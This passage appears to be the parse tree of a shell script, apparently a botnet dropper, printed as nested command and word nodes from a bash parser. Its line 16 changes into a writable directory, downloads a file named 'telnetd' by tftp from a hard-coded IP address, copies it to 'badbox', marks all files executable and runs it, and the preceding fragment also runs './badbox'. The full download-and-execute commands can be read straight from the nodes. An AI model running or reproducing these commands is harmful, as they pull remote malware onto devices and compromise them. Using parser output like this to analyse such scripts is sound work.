  OperatorNode(lineno=15, op=';', pos=(1543, 1544)),
  CommandNode(lineno=15, pos=(1544, 1552), parts=[
    WordNode(lineno=15, pos=(1544, 1552), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1553, 1683), parts=[
  CommandNode(lineno=16, pos=(1553, 1560), parts=[
    WordNode(lineno=16, pos=(1553, 1555), word='cd'),
    WordNode(lineno=16, pos=(1556, 1560), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1561, 1563)),
  CommandNode(lineno=16, pos=(1564, 1575), parts=[
    WordNode(lineno=16, pos=(1564, 1566), word='cd'),
    WordNode(lineno=16, pos=(1567, 1575), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1576, 1578)),
  CommandNode(lineno=16, pos=(1579, 1586), parts=[
    WordNode(lineno=16, pos=(1579, 1581), word='cd'),
    WordNode(lineno=16, pos=(1582, 1586), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1587, 1589)),
  CommandNode(lineno=16, pos=(1590, 1598), parts=[
    WordNode(lineno=16, pos=(1590, 1592), word='cd'),
    WordNode(lineno=16, pos=(1593, 1598), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1599, 1601)),
  CommandNode(lineno=16, pos=(1602, 1606), parts=[
    WordNode(lineno=16, pos=(1602, 1604), word='cd'),
    WordNode(lineno=16, pos=(1605, 1606), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1606, 1607)),
  CommandNode(lineno=16, pos=(1608, 1643), parts=[
    WordNode(lineno=16, pos=(1608, 1612), word='tftp'),
    WordNode(lineno=16, pos=(1613, 1628), word='199.180.133.103'),
    WordNode(lineno=16, pos=(1629, 1631), word='-c'),
    WordNode(lineno=16, pos=(1632, 1635), word='get'),
    WordNode(lineno=16, pos=(1636, 1643), word='telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1643, 1644)),
  CommandNode(lineno=16, pos=(1644, 1663), parts=[
    WordNode(lineno=16, pos=(1644, 1647), word='cat'),
    WordNode(lineno=16, pos=(1648, 1655), word='telnetd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1657, 1663), word='badbox'), pos=(1656, 1663), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1663, 1664)),
  CommandNode(lineno=16, pos=(1664, 1674), parts=[
    WordNode(lineno=16, pos=(1664, 1669), word='chmod'),
    WordNode(lineno=16, pos=(1670, 1672), word='+x'),
    WordNode(lineno=16, pos=(1673, 1674), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1674, 1675)),
  CommandNode(lineno=16, pos=(1675, 1683), parts=[
    WordNode(lineno=16, pos=(1675, 1683), word='./badbox'),
  ]),
])
